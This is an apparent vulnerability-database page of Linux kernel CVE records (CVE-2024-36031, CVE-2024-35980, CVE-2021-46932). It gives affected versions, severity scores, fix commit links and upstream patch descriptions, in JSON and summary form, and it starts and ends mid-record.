            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "5.16",
                "status": "unaffected",
                "version": "5.15.159",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "6.2",
                "status": "unaffected",
                "version": "6.1.91",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "6.9",
                "status": "unaffected",
                "version": "6.8.10",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "6.10",
                "status": "unaffected",
                "version": "6.9.1",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "HIGH",
              "baseScore": 9.8,
              "baseSeverity": "CRITICAL",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-36031",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-05T14:16:33.695503Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-324",
                "description": "CWE-324 Use of a Key Past its Expiration Date",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-06T19:29:28.918Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:20:59.085Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ad2011ea787928b2accb5134f1e423b11fe80a8a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ed79b93f725cd0da39a265dc23d77add1527b9be"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e4519a016650e952ad9eb27937f8c447d5a4e06d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/25777f3f4e1f371d16a594925f31e37ce07b6ec7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/939a08bcd4334bad4b201e60bd0ae1f278d71d41"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cc219cb8afbc40ec100c0de941047bb29373126a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9da27fb65a14c18efd4473e2e82b76b53ba60252"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "security/keys/key.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "ad2011ea787928b2accb5134f1e423b11fe80a8a",
              "status": "affected",
              "version": "97be1e865e70e5a0ad0a5b5f5dca5031ca0b53ac",
              "versionType": "git"
            },
            {
              "lessThan": "ed79b93f725cd0da39a265dc23d77add1527b9be",
              "status": "affected",
              "version": "2552b32b0b349df160a509fe49f5f308cb922f2b",
              "versionType": "git"
            },
            {
              "lessThan": "e4519a016650e952ad9eb27937f8c447d5a4e06d",
              "status": "affected",
              "version": "791d5409cdb974c31a1bc7a903ea729ddc7d83df",
              "versionType": "git"
            },
            {
              "lessThan": "25777f3f4e1f371d16a594925f31e37ce07b6ec7",
              "status": "affected",
              "version": "afc360e8a1256acb7579a6f5b6f2c30b85b39301",
              "versionType": "git"
            },
            {
              "lessThan": "939a08bcd4334bad4b201e60bd0ae1f278d71d41",
              "status": "affected",
              "version": "39299bdd2546688d92ed9db4948f6219ca1b9542",
              "versionType": "git"
            },
            {
              "lessThan": "cc219cb8afbc40ec100c0de941047bb29373126a",
              "status": "affected",
              "version": "39299bdd2546688d92ed9db4948f6219ca1b9542",
              "versionType": "git"
            },
            {
              "lessThan": "9da27fb65a14c18efd4473e2e82b76b53ba60252",
              "status": "affected",
              "version": "39299bdd2546688d92ed9db4948f6219ca1b9542",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "security/keys/key.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.7"
            },
            {
              "lessThan": "6.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.217",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.159",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.91",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.31",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.1",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.217",
                  "versionStartIncluding": "5.10.206",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.159",
                  "versionStartIncluding": "5.15.146",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.91",
                  "versionStartIncluding": "6.1.70",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.31",
                  "versionStartIncluding": "6.6.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.10",
                  "versionStartIncluding": "6.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.1",
                  "versionStartIncluding": "6.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nkeys: Fix overwrite of key expiration on instantiation\n\nThe expiry time of a key is unconditionally overwritten during\ninstantiation, defaulting to turn it permanent. This causes a problem\nfor DNS resolution as the expiration set by user-space is overwritten to\nTIME64_MAX, disabling further DNS updates. Fix this by restoring the\ncondition that key_set_expiry is only called when the pre-parser sets a\nspecific expiry."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:10:56.104Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/ad2011ea787928b2accb5134f1e423b11fe80a8a"
        },
        {
          "url": "https://git.kernel.org/stable/c/ed79b93f725cd0da39a265dc23d77add1527b9be"
        },
        {
          "url": "https://git.kernel.org/stable/c/e4519a016650e952ad9eb27937f8c447d5a4e06d"
        },
        {
          "url": "https://git.kernel.org/stable/c/25777f3f4e1f371d16a594925f31e37ce07b6ec7"
        },
        {
          "url": "https://git.kernel.org/stable/c/939a08bcd4334bad4b201e60bd0ae1f278d71d41"
        },
        {
          "url": "https://git.kernel.org/stable/c/cc219cb8afbc40ec100c0de941047bb29373126a"
        },
        {
          "url": "https://git.kernel.org/stable/c/9da27fb65a14c18efd4473e2e82b76b53ba60252"
        }
      ],
      "title": "keys: Fix overwrite of key expiration on instantiation",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36031",
    "datePublished": "2024-05-30T15:23:46.831Z",
    "dateReserved": "2024-05-17T13:50:33.160Z",
    "dateUpdated": "2025-11-04T17:20:59.085Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-35980 (GCVE-0-2024-35980)

Vulnerability from cvelistv5 – Published: 2024-05-20 09:42 – Updated: 2025-05-04 09:09

Title

arm64: tlb: Fix TLBI RANGE operand

Summary

In the Linux kernel, the following vulnerability has been resolved: arm64: tlb: Fix TLBI RANGE operand KVM/arm64 relies on TLBI RANGE feature to flush TLBs when the dirty pages are collected by VMM and the page table entries become write protected during live migration. Unfortunately, the operand passed to the TLBI RANGE instruction isn't correctly sorted out due to the commit 117940aa6e5f ("KVM: arm64: Define kvm_tlb_flush_vmid_range()"). It leads to crash on the destination VM after live migration because TLBs aren't flushed completely and some of the dirty pages are missed. For example, I have a VM where 8GB memory is assigned, starting from 0x40000000 (1GB). Note that the host has 4KB as the base page size. In the middile of migration, kvm_tlb_flush_vmid_range() is executed to flush TLBs. It passes MAX_TLBI_RANGE_PAGES as the argument to __kvm_tlb_flush_vmid_range() and __flush_s2_tlb_range_op(). SCALE#3 and NUM#31, corresponding to MAX_TLBI_RANGE_PAGES, isn't supported by __TLBI_RANGE_NUM(). In this specific case, -1 has been returned from __TLBI_RANGE_NUM() for SCALE#3/2/1/0 and rejected by the loop in the __flush_tlb_range_op() until the variable @scale underflows and becomes -9, 0xffff708000040000 is set as the operand. The operand is wrong since it's sorted out by __TLBI_VADDR_RANGE() according to invalid @scale and @num. Fix it by extending __TLBI_RANGE_NUM() to support the combination of SCALE#3 and NUM#31. With the changes, [-1 31] instead of [-1 30] can be returned from the macro, meaning the TLBs for 0x200000 pages in the above example can be flushed in one shoot with SCALE#3 and NUM#31. The macro TLBI_RANGE_MASK is dropped since no one uses it any more. The comments are also adjusted accordingly.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/ac4ad513de4fba18b…
	https://git.kernel.org/stable/c/944db7b536baaf49d…
	https://git.kernel.org/stable/c/e3ba51ab24fddef79…

Impacted products

Vendor

Product

Version

Linux

Affected: 117940aa6e5f8308f1529e1313660980f1dae771 , < ac4ad513de4fba18b4ac0ace132777d0910e8cfa (git)
Affected: 117940aa6e5f8308f1529e1313660980f1dae771 , < 944db7b536baaf49d7e576af36a94f4719552b07 (git)
Affected: 117940aa6e5f8308f1529e1313660980f1dae771 , < e3ba51ab24fddef79fc212f9840de54db8fd1685 (git)

Linux

Affected: 6.6
Unaffected: 0 , < 6.6 (semver)
Unaffected: 6.6.29 , ≤ 6.6.* (semver)
Unaffected: 6.8.7 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35980",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-20T17:01:18.086941Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:34:21.474Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.188Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ac4ad513de4fba18b4ac0ace132777d0910e8cfa"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/944db7b536baaf49d7e576af36a94f4719552b07"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e3ba51ab24fddef79fc212f9840de54db8fd1685"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "arch/arm64/include/asm/tlbflush.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "ac4ad513de4fba18b4ac0ace132777d0910e8cfa",
              "status": "affected",
              "version": "117940aa6e5f8308f1529e1313660980f1dae771",
              "versionType": "git"
            },
            {
              "lessThan": "944db7b536baaf49d7e576af36a94f4719552b07",
              "status": "affected",
              "version": "117940aa6e5f8308f1529e1313660980f1dae771",
              "versionType": "git"
            },
            {
              "lessThan": "e3ba51ab24fddef79fc212f9840de54db8fd1685",
              "status": "affected",
              "version": "117940aa6e5f8308f1529e1313660980f1dae771",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "arch/arm64/include/asm/tlbflush.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.6"
            },
            {
              "lessThan": "6.6",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.29",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.29",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.7",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\narm64: tlb: Fix TLBI RANGE operand\n\nKVM/arm64 relies on TLBI RANGE feature to flush TLBs when the dirty\npages are collected by VMM and the page table entries become write\nprotected during live migration. Unfortunately, the operand passed\nto the TLBI RANGE instruction isn\u0027t correctly sorted out due to the\ncommit 117940aa6e5f (\"KVM: arm64: Define kvm_tlb_flush_vmid_range()\").\nIt leads to crash on the destination VM after live migration because\nTLBs aren\u0027t flushed completely and some of the dirty pages are missed.\n\nFor example, I have a VM where 8GB memory is assigned, starting from\n0x40000000 (1GB). Note that the host has 4KB as the base page size.\nIn the middile of migration, kvm_tlb_flush_vmid_range() is executed\nto flush TLBs. It passes MAX_TLBI_RANGE_PAGES as the argument to\n__kvm_tlb_flush_vmid_range() and __flush_s2_tlb_range_op(). SCALE#3\nand NUM#31, corresponding to MAX_TLBI_RANGE_PAGES, isn\u0027t supported\nby __TLBI_RANGE_NUM(). In this specific case, -1 has been returned\nfrom __TLBI_RANGE_NUM() for SCALE#3/2/1/0 and rejected by the loop\nin the __flush_tlb_range_op() until the variable @scale underflows\nand becomes -9, 0xffff708000040000 is set as the operand. The operand\nis wrong since it\u0027s sorted out by __TLBI_VADDR_RANGE() according to\ninvalid @scale and @num.\n\nFix it by extending __TLBI_RANGE_NUM() to support the combination of\nSCALE#3 and NUM#31. With the changes, [-1 31] instead of [-1 30] can\nbe returned from the macro, meaning the TLBs for 0x200000 pages in the\nabove example can be flushed in one shoot with SCALE#3 and NUM#31. The\nmacro TLBI_RANGE_MASK is dropped since no one uses it any more. The\ncomments are also adjusted accordingly."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:09:46.451Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/ac4ad513de4fba18b4ac0ace132777d0910e8cfa"
        },
        {
          "url": "https://git.kernel.org/stable/c/944db7b536baaf49d7e576af36a94f4719552b07"
        },
        {
          "url": "https://git.kernel.org/stable/c/e3ba51ab24fddef79fc212f9840de54db8fd1685"
        }
      ],
      "title": "arm64: tlb: Fix TLBI RANGE operand",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35980",
    "datePublished": "2024-05-20T09:42:05.085Z",
    "dateReserved": "2024-05-17T13:50:33.144Z",
    "dateUpdated": "2025-05-04T09:09:46.451Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2021-46932 (GCVE-0-2021-46932)

Vulnerability from cvelistv5 – Published: 2024-02-27 09:44 – Updated: 2025-05-04 07:00

Title

Input: appletouch - initialize work before device registration

Summary

In the Linux kernel, the following vulnerability has been resolved: Input: appletouch - initialize work before device registration Syzbot has reported warning in __flush_work(). This warning is caused by work->func == NULL, which means missing work initialization. This may happen, since input_dev->close() calls cancel_work_sync(&dev->work), but dev->work initalization happens _after_ input_register_device() call. So this patch moves dev->work initialization before registering input device

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/d2cb2bf39a6d17ef4…
	https://git.kernel.org/stable/c/d1962f263a176f493…
	https://git.kernel.org/stable/c/292d2ac61fb0d9276…
	https://git.kernel.org/stable/c/a02e1404e27855089…
	https://git.kernel.org/stable/c/975774ea7528b4899…
	https://git.kernel.org/stable/c/9f329d0d6c91142cf…
	https://git.kernel.org/stable/c/e79ff8c68acb1eddf…
	https://git.kernel.org/stable/c/9f3ccdc3f6ef10084…

Impacted products

Vendor

Product

Version

Linux

Affected: 5a6eb676d3bc4d7a6feab200a92437b62ad298da , < d2cb2bf39a6d17ef4bdc0e59c1a35cf5751ad8f4 (git)
Affected: 5a6eb676d3bc4d7a6feab200a92437b62ad298da , < d1962f263a176f493400b8f91bfbf2bfedce951e (git)
Affected: 5a6eb676d3bc4d7a6feab200a92437b62ad298da , < 292d2ac61fb0d9276a0f7b7ce4f50426f2a1c99f (git)
Affected: 5a6eb676d3bc4d7a6feab200a92437b62ad298da , < a02e1404e27855089d2b0a0acc4652c2ce65fe46 (git)
Affected: 5a6eb676d3bc4d7a6feab200a92437b62ad298da , < 975774ea7528b489930b76a77ffc4d5379b95ff2 (git)
Affected: 5a6eb676d3bc4d7a6feab200a92437b62ad298da , < 9f329d0d6c91142cf0ad08d23c72dd195db2633c (git)
Affected: 5a6eb676d3bc4d7a6feab200a92437b62ad298da , < e79ff8c68acb1eddf709d3ac84716868f2a91012 (git)
Affected: 5a6eb676d3bc4d7a6feab200a92437b62ad298da , < 9f3ccdc3f6ef10084ceb3a47df0961bec6196fd0 (git)

Linux

Affected: 2.6.23
Unaffected: 0 , < 2.6.23 (semver)
Unaffected: 4.4.298 , ≤ 4.4.* (semver)
Unaffected: 4.9.296 , ≤ 4.9.* (semver)
Unaffected: 4.14.261 , ≤ 4.14.* (semver)
Unaffected: 4.19.224 , ≤ 4.19.* (semver)
Unaffected: 5.4.170 , ≤ 5.4.* (semver)
Unaffected: 5.10.90 , ≤ 5.10.* (semver)
Unaffected: 5.15.13 , ≤ 5.15.* (semver)
Unaffected: 5.16 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2021-46932",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-02-27T16:12:57.763250Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-07-05T17:22:01.591Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T05:17:42.851Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d2cb2bf39a6d17ef4bdc0e59c1a35cf5751ad8f4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d1962f263a176f493400b8f91bfbf2bfedce951e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/292d2ac61fb0d9276a0f7b7ce4f50426f2a1c99f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a02e1404e27855089d2b0a0acc4652c2ce65fe46"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/975774ea7528b489930b76a77ffc4d5379b95ff2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9f329d0d6c91142cf0ad08d23c72dd195db2633c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e79ff8c68acb1eddf709d3ac84716868f2a91012"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9f3ccdc3f6ef10084ceb3a47df0961bec6196fd0"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/input/mouse/appletouch.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "d2cb2bf39a6d17ef4bdc0e59c1a35cf5751ad8f4",
              "status": "affected",
              "version": "5a6eb676d3bc4d7a6feab200a92437b62ad298da",
              "versionType": "git"
            },
            {
              "lessThan": "d1962f263a176f493400b8f91bfbf2bfedce951e",
              "status": "affected",
              "version": "5a6eb676d3bc4d7a6feab200a92437b62ad298da",
              "versionType": "git"
            },
            {
              "lessThan": "292d2ac61fb0d9276a0f7b7ce4f50426f2a1c99f",
              "status": "affected",
              "version": "5a6eb676d3bc4d7a6feab200a92437b62ad298da",
              "versionType": "git"
            },
            {
              "lessThan": "a02e1404e27855089d2b0a0acc4652c2ce65fe46",
              "status": "affected",
              "version": "5a6eb676d3bc4d7a6feab200a92437b62ad298da",
              "versionType": "git"
            },
            {
              "lessThan": "975774ea7528b489930b76a77ffc4d5379b95ff2",
              "status": "affected",
              "version": "5a6eb676d3bc4d7a6feab200a92437b62ad298da",
              "versionType": "git"
            },
            {
              "lessThan": "9f329d0d6c91142cf0ad08d23c72dd195db2633c",
              "status": "affected",
              "version": "5a6eb676d3bc4d7a6feab200a92437b62ad298da",
              "versionType": "git"
            },
            {
              "lessThan": "e79ff8c68acb1eddf709d3ac84716868f2a91012",
              "status": "affected",
              "version": "5a6eb676d3bc4d7a6feab200a92437b62ad298da",
              "versionType": "git"
            },
            {
              "lessThan": "9f3ccdc3f6ef10084ceb3a47df0961bec6196fd0",
              "status": "affected",
              "version": "5a6eb676d3bc4d7a6feab200a92437b62ad298da",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/input/mouse/appletouch.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.23"
            },
            {
              "lessThan": "2.6.23",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.4.*",
              "status": "unaffected",
              "version": "4.4.298",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.9.*",
              "status": "unaffected",
              "version": "4.9.296",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.14.*",
              "status": "unaffected",
              "version": "4.14.261",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.224",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.170",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.90",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.13",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "5.16",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.4.298",
                  "versionStartIncluding": "2.6.23",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.9.296",
                  "versionStartIncluding": "2.6.23",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.14.261",
                  "versionStartIncluding": "2.6.23",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.224",
                  "versionStartIncluding": "2.6.23",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.170",
                  "versionStartIncluding": "2.6.23",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.90",
                  "versionStartIncluding": "2.6.23",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.13",
                  "versionStartIncluding": "2.6.23",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.16",
                  "versionStartIncluding": "2.6.23",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: appletouch - initialize work before device registration\n\nSyzbot has reported warning in __flush_work(). This warning is caused by\nwork-\u003efunc == NULL, which means missing work initialization.\n\nThis may happen, since input_dev-\u003eclose() calls\ncancel_work_sync(\u0026dev-\u003ework), but dev-\u003ework initalization happens _after_\ninput_register_device() call.\n\nSo this patch moves dev-\u003ework initialization before registering input\ndevice"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T07:00:36.105Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/d2cb2bf39a6d17ef4bdc0e59c1a35cf5751ad8f4"
        },
        {
          "url": "https://git.kernel.org/stable/c/d1962f263a176f493400b8f91bfbf2bfedce951e"
        },
        {
